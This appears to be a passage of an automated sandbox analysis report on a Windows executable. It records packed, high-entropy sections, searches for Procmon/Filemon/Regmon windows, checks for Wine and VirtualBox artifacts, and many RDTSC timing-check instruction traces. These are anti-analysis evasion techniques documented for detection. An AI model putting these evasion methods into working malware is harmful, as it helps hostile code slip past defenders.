Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
Source: 0gnHF2twcT.exe Static PE information: section name: entropy: 7.980219456440776
Source: 0gnHF2twcT.exe Static PE information: section name: mimqpfga entropy: 7.95348924063239

Boot Survival

barindex
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\0gnHF2twcT.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C83E0 second address: C83E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C83E4 second address: C83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C83EA second address: C8400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C8400 second address: C8404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C8404 second address: C7C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F05491602E4h 0x0000000e push dword ptr [ebp+122D0009h] 0x00000014 cld 0x00000015 call dword ptr [ebp+122D2BB0h] 0x0000001b pushad 0x0000001c cmc 0x0000001d jmp 00007F05491602E8h 0x00000022 xor eax, eax 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D3072h], edi 0x0000002b jnc 00007F05491602DCh 0x00000031 popad 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jp 00007F05491602EFh 0x0000003c mov dword ptr [ebp+122D39EFh], eax 0x00000042 pushad 0x00000043 mov edi, eax 0x00000045 mov dword ptr [ebp+122D3072h], ebx 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 mov dword ptr [ebp+122D2E43h], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jg 00007F05491602DCh 0x00000061 mov dword ptr [ebp+122D2BD8h], esi 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D3072h], ebx 0x0000006f sub dword ptr [ebp+122D2E4Ah], ebx 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 cld 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e jmp 00007F05491602E7h 0x00000083 nop 0x00000084 push edx 0x00000085 jmp 00007F05491602DBh 0x0000008a pop edx 0x0000008b push eax 0x0000008c pushad 0x0000008d push eax 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: C7C06 second address: C7C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247511 second address: 247526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F05491602DEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24766E second address: 247672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247672 second address: 24767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24767B second address: 247682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247682 second address: 247688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247688 second address: 24769C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2477FA second address: 24780A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24794C second address: 247963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247963 second address: 247969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247ACD second address: 247AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247AD1 second address: 247ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247ADD second address: 247AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 247AE3 second address: 247AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F02 second address: 249F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F08 second address: 249F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F0C second address: 249F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F10 second address: 249F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, 89D0h 0x0000000f push 00000000h 0x00000011 stc 0x00000012 push E9CBCAA5h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F05491602E9h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F42 second address: 249F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F47 second address: 249FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05491602D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 163435DBh 0x00000014 mov cl, EAh 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D2AC2h], ebx 0x0000001e push 00000000h 0x00000020 jmp 00007F05491602E6h 0x00000025 push 00000003h 0x00000027 or dword ptr [ebp+122D298Bh], ecx 0x0000002d push 87DEDFDCh 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007F05491602EDh 0x0000003a jmp 00007F05491602E7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249FA9 second address: 24A011 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0549119942h 0x00000008 jmp 00007F054911993Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 47DEDFDCh 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F0549119938h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 lea ebx, dword ptr [ebp+12455D28h] 0x00000036 jmp 00007F0549119942h 0x0000003b sub esi, dword ptr [ebp+122D2EE0h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jo 00007F054911993Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A011 second address: 24A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A015 second address: 24A01A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A06E second address: 24A0A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F05491602D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 and ecx, dword ptr [ebp+122D2B43h] 0x0000001a add dword ptr [ebp+122D2CE2h], ebx 0x00000020 push 00000000h 0x00000022 sub esi, dword ptr [ebp+122D29A1h] 0x00000028 push 390B6A6Fh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jns 00007F05491602D6h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A0A7 second address: 24A122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 390B6AEFh 0x00000010 mov cx, 7DCAh 0x00000014 push 00000003h 0x00000016 mov di, A54Dh 0x0000001a push 00000000h 0x0000001c cmc 0x0000001d push 00000003h 0x0000001f call 00007F0549119939h 0x00000024 jmp 00007F0549119947h 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007F0549119948h 0x00000030 push edi 0x00000031 push esi 0x00000032 pop esi 0x00000033 pop edi 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F054911993Ah 0x00000040 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A122 second address: 24A127 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A127 second address: 24A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0549119945h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A1F5 second address: 24A1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A1FF second address: 24A235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F054911993Ah 0x0000000c nop 0x0000000d and dh, FFFFFFE1h 0x00000010 push 00000000h 0x00000012 push 8D5E998Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0549119948h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A235 second address: 24A23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 25C9A5 second address: 25C9AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 25C9AA second address: 25C9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F05491602E1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26A402 second address: 26A426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0549119941h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26A426 second address: 26A440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 jbe 00007F05491602DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26816F second address: 268186 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F054911993Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268186 second address: 26818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26818C second address: 268190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268190 second address: 2681B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F05491602E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2681B2 second address: 2681C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2681C3 second address: 2681E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007F05491602D6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268487 second address: 26848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26848F second address: 268495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2685C4 second address: 2685C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268710 second address: 268716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268716 second address: 268735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0549119948h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268D0B second address: 268D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268D0F second address: 268D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119940h 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268E86 second address: 268EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268EA5 second address: 268EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268EA9 second address: 268EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26900A second address: 269014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269014 second address: 269018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269018 second address: 269033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F0549119942h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269033 second address: 26904E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jng 00007F05491602DCh 0x0000000d ja 00007F05491602DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26904E second address: 269062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F054911993Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269062 second address: 269066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269066 second address: 26906C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26933E second address: 269346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694DC second address: 2694F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F054911993Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694F7 second address: 2694FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694FF second address: 26950F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AC4 second address: 269AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AC8 second address: 269ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ACC second address: 269AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AD4 second address: 269ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ADA second address: 269ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ADE second address: 269AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DD3 second address: 269DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DD7 second address: 269DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0549119936h 0x0000000e jmp 00007F054911993Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DF1 second address: 269DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B979 second address: 26B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B97F second address: 26B994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F05491602DAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B994 second address: 26B998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B998 second address: 26B99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26CEA0 second address: 26CEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
